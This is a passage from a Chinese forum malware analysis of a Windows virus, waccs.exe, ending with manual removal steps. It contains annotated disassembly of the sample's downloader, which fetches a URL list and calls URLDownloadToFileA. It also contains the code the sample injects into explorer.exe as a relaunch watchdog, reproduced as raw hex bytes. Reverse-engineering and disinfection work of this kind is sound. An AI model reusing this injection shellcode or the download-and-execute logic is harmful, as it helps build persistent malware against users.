6A 00 PUSH 0 00404E00 6A 00 PUSH 0 00404E02 8D85 49EBFFFF LEA EAX,DWORD PTR SS:[EBP-14B7] 00404E08 50 PUSH EAX 00404E09 FFB5 20E8FFFF PUSH DWORD PTR SS:[EBP-17E0] 00404E0F FF15 B8814000 CALL DWORD PTR DS:[4081B8] ; WININET.InternetOpenUrlA 00404E15 8985 30E8FFFF MOV DWORD PTR SS:[EBP-17D0],EAX 00404E1B 83BD 30E8FFFF 0>CMP DWORD PTR SS:[EBP-17D0],0 00404E22 75 05 JNZ SHORT waccs.00404E29 00404E24 E8 7F220000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404E29 8D85 F8EFFFFF LEA EAX,DWORD PTR SS:[EBP-1008] 00404E2F 50 PUSH EAX 00404E30 68 00100000 PUSH 1000 00404E35 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004] 00404E3B 50 PUSH EAX 00404E3C FFB5 30E8FFFF PUSH DWORD PTR SS:[EBP-17D0] 00404E42 FF15 BC814000 CALL DWORD PTR DS:[4081BC] ; WININET.InternetReadFile 00404E48 85C0 TEST EAX,EAX 00404E4A 75 05 JNZ SHORT waccs.00404E51 00404E4C E8 57220000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404E51 83A5 18E7FFFF 0>AND DWORD PTR SS:[EBP-18E8],0 00404E58 68 DA43FADE PUSH DEFA43DA 00404E5D 8D8D F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C] 00404E63 E8 71040000 CALL waccs.004052D9 00404E68 50 PUSH EAX 00404E69 FFB5 60EDFFFF PUSH DWORD PTR SS:[EBP-12A0] 00404E6F E8 DE210000 CALL waccs.00407052 ; JMP 到 msvcrt.strstr 00404E74 59 POP ECX 00404E75 59 POP ECX 00404E76 8985 34E8FFFF MOV DWORD PTR SS:[EBP-17CC],EAX 00404E7C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC] 00404E82 8985 F8E6FFFF MOV DWORD PTR SS:[EBP-1908],EAX 00404E88 8D8D F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C] 00404E8E E8 36030000 CALL waccs.004051C9 00404E93 83BD F8E6FFFF 0>CMP DWORD PTR SS:[EBP-1908],0 00404E9A 74 38 JE SHORT waccs.00404ED4 00404E9C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC] 00404EA2 8020 00 AND BYTE PTR DS:[EAX],0 00404EA5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8] 00404EAB 8B8D 60EDFFFF MOV ECX,DWORD PTR SS:[EBP-12A0] 00404EB1 898C85 68EEFFFF MOV DWORD PTR SS:[EBP+EAX*4-1198],ECX 00404EB8 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC] 00404EBE 40 INC EAX 00404EBF 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX 00404EC5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8] 00404ECB 40 INC EAX 00404ECC 8985 18E7FFFF MOV DWORD PTR SS:[EBP-18E8],EAX 00404ED2 ^ EB 84 JMP SHORT waccs.00404E58 00404ED4 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404EDA 50 PUSH EAX 00404EDB 68 04010000 PUSH 104 00404EE0 FF15 A4804000 CALL DWORD PTR DS:[4080A4] ; kernel32.GetTempPathA 00404EE6 8D85 45EAFFFF LEA EAX,DWORD PTR SS:[EBP-15BB] 00404EEC 50 PUSH EAX 00404EED 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404EF3 50 PUSH EAX 00404EF4 68 23B863A8 PUSH A863B823 00404EF9 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914] 00404EFF E8 35040000 CALL waccs.00405339 00404F04 50 PUSH EAX 00404F05 68 04010000 PUSH 104 00404F0A 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404F10 50 PUSH EAX 00404F11 E8 2A210000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf 00404F16 83C4 14 ADD ESP,14 00404F19 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914] 00404F1F E8 02D1FFFF CALL waccs.00402026 00404F24 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404F2A 50 PUSH EAX 00404F2B E8 BFF0FFFF CALL waccs.00403FEF 00404F30 59 POP ECX 00404F31 0FB6C0 MOVZX EAX,AL 00404F34 85C0 TEST EAX,EAX 00404F36 74 0D JE SHORT waccs.00404F45 00404F38 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404F3E 50 PUSH EAX 00404F3F FF15 E8804000 CALL DWORD PTR DS:[4080E8] ; kernel32.DeleteFileA 00404F45 0FBE85 3DE8FFFF MOVSX EAX,BYTE PTR SS:[EBP-17C3] 00404F4C 85C0 TEST EAX,EAX 00404F4E 0F84 B5000000 JE waccs.00405009 00404F54 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00404F5A 50 PUSH EAX 00404F5B E8 EC200000 CALL waccs.0040704C ; JMP 到 msvcrt.srand 00404F60 59 POP ECX 00404F61 E8 E0200000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00404F66 99 CDQ 00404F67 6A 09 PUSH 9 00404F69 59 POP ECX 00404F6A F7F9 IDIV ECX 00404F6C 52 PUSH EDX 00404F6D E8 D4200000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00404F72 99 CDQ 00404F73 6A 09 PUSH 9 00404F75 59 POP ECX 00404F76 F7F9 IDIV ECX 00404F78 52 PUSH EDX 00404F79 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404F7F 50 PUSH EAX 00404F80 68 EADFCD01 PUSH 1CDDFEA 00404F85 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920] 00404F8B E8 09040000 CALL waccs.00405399 00404F90 50 PUSH EAX 00404F91 68 04010000 PUSH 104 00404F96 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404F9C 50 PUSH EAX 00404F9D E8 9E200000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf 00404FA2 83C4 18 ADD ESP,18 00404FA5 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920] 00404FAB E8 C6D0FFFF CALL waccs.00402076 00404FB0 6A 00 PUSH 0 00404FB2 6A 00 PUSH 0 00404FB4 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404FBA 50 PUSH EAX 00404FBB 8D85 3DE8FFFF LEA EAX,DWORD PTR SS:[EBP-17C3] 00404FC1 50 PUSH EAX 00404FC2 6A 00 PUSH 0 00404FC4 E8 EB210000 CALL waccs.004071B4 ; JMP 到 urlmon.URLDownloadToFileA 00404FC9 8985 24E8FFFF MOV DWORD PTR SS:[EBP-17DC],EAX 00404FCF 83BD 24E8FFFF 0>CMP DWORD PTR SS:[EBP-17DC],0 00404FD6 74 05 JE SHORT waccs.00404FDD 00404FD8 E8 CB200000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404FDD 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF] 00404FE3 50 PUSH EAX 00404FE4 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404FEA 50 PUSH EAX 00404FEB 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404FF1 50 PUSH EAX 00404FF2 E8 181B0000 CALL waccs.00406B0F 00404FF7 83C4 0C ADD ESP,0C 00404FFA 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00405000 50 PUSH EAX 00405001 FF15 E8804000 CALL DWORD PTR DS:[4080E8] ; kernel32.DeleteFileA 00405007 EB 38 JMP SHORT waccs.00405041 00405009 68 04010000 PUSH 104 0040500E 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00405014 50 PUSH EAX 00405015 6A 00 PUSH 0 00405017 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA 0040501D 50 PUSH EAX 0040501E FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA 00405024 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF] 0040502A 50 PUSH EAX 0040502B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00405031 50 PUSH EAX 00405032 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00405038 50 PUSH EAX 00405039 E8 D11A0000 CALL waccs.00406B0F 0040503E 83C4 0C ADD ESP,0C 00405041 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00405047 50 PUSH EAX 00405048 E8 A2EFFFFF CALL waccs.00403FEF 0040504D 59 POP ECX 0040504E 0FB6C0 MOVZX EAX,AL 00405051 85C0 TEST EAX,EAX 00405053 75 05 JNZ SHORT waccs.0040505A 00405055 E8 4E200000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 0040505A FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00405060 8985 38E8FFFF MOV DWORD PTR SS:[EBP-17C8],EAX 00405066 8B85 50ECFFFF MOV EAX,DWORD PTR SS:[EBP-13B0] 0040506C 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 0040506F EB 07 JMP SHORT waccs.00405078 00405071 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00405074 48 DEC EAX 00405075 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 00405078 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 0040507C 7E 38 JLE SHORT waccs.004050B6 0040507E FFB5 18E7FFFF PUSH DWORD PTR SS:[EBP-18E8] 00405084 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198] 0040508A 50 PUSH EAX 0040508B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00405091 50 PUSH EAX 00405092 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8] 00405098 E8 ECF8FFFF CALL waccs.00404989 0040509D 83C4 10 ADD ESP,10 004050A0 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004050A3 48 DEC EAX 004050A4 85C0 TEST EAX,EAX 004050A6 7E 0C JLE SHORT waccs.004050B4 004050A8 FFB5 54ECFFFF PUSH DWORD PTR SS:[EBP-13AC] 004050AE FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep 004050B4 ^ EB BB JMP SHORT waccs.00405071 004050B6 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 004050BC 8985 2CE8FFFF MOV DWORD PTR SS:[EBP-17D4],EAX 004050C2 8B85 2CE8FFFF MOV EAX,DWORD PTR SS:[EBP-17D4] 004050C8 2B85 38E8FFFF SUB EAX,DWORD PTR SS:[EBP-17C8] 004050CE 99 CDQ 004050CF B9 60EA0000 MOV ECX,0EA60 004050D4 F7F9 IDIV ECX 004050D6 50 PUSH EAX 004050D7 FFB5 50ECFFFF PUSH DWORD PTR SS:[EBP-13B0] 004050DD 68 449F4000 PUSH waccs.00409F44 004050E2 68 489F4000 PUSH waccs.00409F48 004050E7 8B85 58ECFFFF MOV EAX,DWORD PTR SS:[EBP-13A8] 004050ED 05 D3000000 ADD EAX,0D3 004050F2 50 PUSH EAX 004050F3 68 26E784BB PUSH BB84E726 004050F8 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C] 004050FE E8 F6020000 CALL waccs.004053F9 00405103 50 PUSH EAX 00405104 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8] 0040510A E8 F1BEFFFF CALL waccs.00401000 0040510F 83C4 1C ADD ESP,1C 00405112 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C] 00405118 E8 D4000000 CALL waccs.004051F1 0040511D E8 861F0000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00405122 5F POP EDI 00405123 5E POP ESI 00405124 C9 LEAVE 00405125 C3 RETN ; 返回. ---------------------------------------------------------- ---------------------------------------------------------------------------------------------------- ---------------------------------------------------------- 3、对病毒注入到系统桌面程序“explorer.exe”进程中的恶意代码进行分析: 注入的代码段: [进程守护功能:循环执行检测代码,根据互斥体名称判断病毒主程序是否在运行,如果发现病毒主程序互斥体名称不存在(进程被关闭),则马上重新调用病毒程序启动运行.] 01A50000 55 PUSH EBP ; 注入代码的入口. 01A50001 8BEC MOV EBP,ESP 01A50003 83EC 08 SUB ESP,8 01A50006 6A 00 PUSH 0 ; /hTemplateFile = NULL 01A50008 68 80000000 PUSH 80 ; |Attributes = NORMAL 01A5000D 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING 01A5000F 6A 00 PUSH 0 ; |pSecurity = NULL 01A50011 6A 01 PUSH 1 ; |ShareMode = FILE_SHARE_READ 01A50013 68 00000080 PUSH 80000000 ; |Access = GENERIC_READ 01A50018 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A5001B 83C0 1C ADD EAX,1C 01A5001E 50 PUSH EAX ; ASCII "C:\WINDOWS\system32\waccs.exe" 01A5001F 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 01A50022 FF51 04 CALL DWORD PTR DS:[ECX+4] ; kernel32.CreateFileA(以共享读的方式打开病毒主程序文件,防止被用户或安全软件删除). 01A50025 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 01A50028 BA 01000000 MOV EDX,1 01A5002D 85D2 TEST EDX,EDX ; 判断函数返回值. 01A5002F 74 72 JE SHORT 01A500A3 ; 如果文件不存在,则跳出. 01A50031 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A50034 05 20010000 ADD EAX,120 01A50039 50 PUSH EAX ; /MutexName = "t3x0" 01A5003A 6A 00 PUSH 0 ; |InitialOwner = FALSE 01A5003C 6A 00 PUSH 0 ; |pSecurity = NULL 01A5003E 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 01A50041 FF51 08 CALL DWORD PTR DS:[ECX+8] ; kernel32.CreateMutexA 01A50044 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 01A50047 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 01A5004A FF52 0C CALL DWORD PTR DS:[EDX+C] ; ntdll.RtlGetLastWin32Error 01A5004D 3D B7000000 CMP EAX,0B7 01A50052 74 2F JE SHORT 01A50083 ; 判断病毒进程是否在还运行. 01A50054 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] ; 如果发现病毒进程不存在了,就从这里开始执行. 01A50057 50 PUSH EAX 01A50058 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 019B005B FF11 CALL DWORD PTR DS:[ECX] ; kernel32.CloseHandle(关闭句柄). 01A5005D 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 01A50060 52 PUSH EDX 01A50061 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 019B0064 FF50 10 CALL DWORD PTR DS:[EAX+10] ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体). 01A50067 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 01A5006A 51 PUSH ECX 01A5006B 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 019B006E FF12 CALL DWORD PTR DS:[EDX] ; kernel32.CloseHandle(关闭句柄). 01A50070 6A 00 PUSH 0 01A50072 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A50075 83C0 1C ADD EAX,1C 01A50078 50 PUSH EAX ; ASCII "C:\WINDOWS\system32\waccs.exe" 01A50079 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 019B007C FF51 18 CALL DWORD PTR DS:[ECX+18] ; kernel32.WinExec(重新调用病毒程序启动运行). 01A5007F 33C0 XOR EAX,EAX 01A50081 EB 22 JMP SHORT 01A500A5 ; 跳出循环. 01A50083 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 01A50086 52 PUSH EDX 01A50087 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A5008A FF50 10 CALL DWORD PTR DS:[EAX+10] ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体). 01A5008D 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 01A50090 51 PUSH ECX 01A50091 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 01690094 FF12 CALL DWORD PTR DS:[EDX] ; kernel32.CloseHandle(关闭句柄). 01A50096 68 10270000 PUSH 2710 01A5009B 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0169009E FF50 14 CALL DWORD PTR DS:[EAX+14] ; kernel32.Sleep(等待). 01A500A1 ^ EB 85 JMP SHORT 01A50028 ; 循环执行这段检测代码. 01A500A3 33C0 XOR EAX,EAX 01A500A5 8BE5 MOV ESP,EBP 01A500A7 5D POP EBP 01A500A8 C2 0400 RETN 4 ; 返回(退出). 注入的数据段: 0012F550 47 9B 80 7C 24 1A 80 7C G泙|$€| 0012F558 3F E9 80 7C 31 03 93 7C ?閫|1搢 0012F560 A7 24 80 7C 42 24 80 7C ?€|B$€| 0012F568 6D 13 86 7C 43 3A 5C 57 m唡C:\W 0012F570 49 4E 44 4F 57 53 5C 73 INDOWS\s 0012F578 79 73 74 65 6D 33 32 5C ystem32\ 0012F580 77 61 63 63 73 2E 65 78 waccs.ex 0012F588 65 00 00 00 00 00 00 00 e....... 0012F590 00 00 00 00 00 00 00 00 ........ 0012F598 00 00 00 00 00 00 00 00 ........ 0012F5A0 00 00 00 00 00 00 00 00 ........ 0012F5A8 00 00 00 00 00 00 00 00 ........ 0012F5B0 00 00 00 00 00 00 00 00 ........ 0012F5B8 00 00 00 00 00 00 00 00 ........ 0012F5C0 00 00 00 00 00 00 00 00 ........ 0012F5C8 00 00 00 00 00 00 00 00 ........ 0012F5D0 00 00 00 00 00 00 00 00 ........ 0012F5D8 00 00 00 00 00 00 00 00 ........ 0012F5E0 00 00 00 00 00 00 00 00 ........ 0012F5E8 00 00 00 00 00 00 00 00 ........ 0012F5F0 00 00 00 00 00 00 00 00 ........ 0012F5F8 00 00 00 00 00 00 00 00 ........ 0012F600 00 00 00 00 00 00 00 00 ........ 0012F608 00 00 00 00 00 00 00 00 ........ 0012F610 00 00 00 00 00 00 00 00 ........ 0012F618 00 00 00 00 00 00 00 00 ........ 0012F620 00 00 00 00 00 00 00 00 ........ 0012F628 00 00 00 00 00 00 00 00 ........ 0012F630 00 00 00 00 00 00 00 00 ........ 0012F638 00 00 00 00 00 00 00 00 ........ 0012F640 00 00 00 00 00 00 00 00 ........ 0012F648 00 00 00 00 00 00 00 00 ........ 0012F650 00 00 00 00 00 00 00 00 ........ 0012F658 00 00 00 00 00 00 00 00 ........ 0012F660 00 00 00 00 00 00 00 00 ........ 0012F668 00 00 00 00 00 00 00 00 ........ 0012F670 74 33 78 30 00 00 00 00 t3x0.... 0012F678 00 00 00 00 00 00 00 00 ........ 0012F680 00 00 00 00 00 00 00 00 ........ 0012F688 00 00 00 00 00 00 00 00 ........ 0012F690 00 00 00 00 00 00 00 00 ........ 0012F698 00 00 00 00 00 00 00 00 ........ 0012F6A0 00 00 00 00 00 00 00 00 ........ 0012F6A8 00 00 00 00 00 00 00 00 ........ 0012F6B0 00 . ---------------------------------------------------------- 注入的数据段: 47 9B 80 7C 24 1A 80 7C 3F E9 80 7C 31 03 93 7C A7 24 80 7C 42 24 80 7C 6D 13 86 7C 43 3A 5C 57 49 4E 44 4F 57 53 5C 73 79 73 74 65 6D 33 32 5C 77 61 63 63 73 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 33 78 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 注入的代码段: 55 8B EC 83 EC 08 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 45 08 83 C0 1C 50 8B 4D 08 FF 51 04 89 45 F8 BA 01 00 00 00 85 D2 74 72 8B 45 08 05 20 01 00 00 50 6A 00 6A 00 8B 4D 08 FF 51 08 89 45 FC 8B 55 08 FF 52 0C 3D B7 00 00 00 74 2F 8B 45 F8 50 8B 4D 08 FF 11 8B 55 FC 52 8B 45 08 FF 50 10 8B 4D FC 51 8B 55 08 FF 12 6A 00 8B 45 08 83 C0 1C 50 8B 4D 08 FF 51 18 33 C0 EB 22 8B 55 FC 52 8B 45 08 FF 50 10 8B 4D FC 51 8B 55 08 FF 12 68 10 27 00 00 8B 45 08 FF 50 14 EB 85 33 C0 8B E5 5D C2 04 00 55 ---------------------------------------------------------- ---------------------------------------------------------------------------------------------------- **************************************************************************************************** 三、手动杀毒方法步骤(在系统真实环境下测试有效): 1:终止关闭掉病毒保护进程“explorer.exe”(系统桌面程序)。 2:结束掉病毒进程“C:\windows\system32\waccs.exe”。 3:删除掉病毒程序文件“C:\windows\system32\waccs.exe”。 4:重新启动运行系统桌面程序“C:\windows\explorer.exe”,查杀病毒完毕。 **************************************************************************************************** //////////////////////////////////////////////////////////////////////////////////////////////////// |
|
[原创]驱动加载工具(InstDrv - V1.3中文版)
自己开心就好,呵呵!别想太多。。。 |
|
[原创]“hackme”程序的分析破解报告
这个是我在刚学破解时写的,写的很菜,将就着看吧,呵呵。 “一定要转为16进制”。因为程序内部是以10进制进行运算的,但程序在运算前要先把您输入的数据转换成10进制。所以为了运算顺利,您就需要把十进制“255255”转换为十六进制“3E517”再输入,这样就验证正确了。 这么老的帖子您也可以挖出来???呵呵,强!谢谢支持哦! |
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值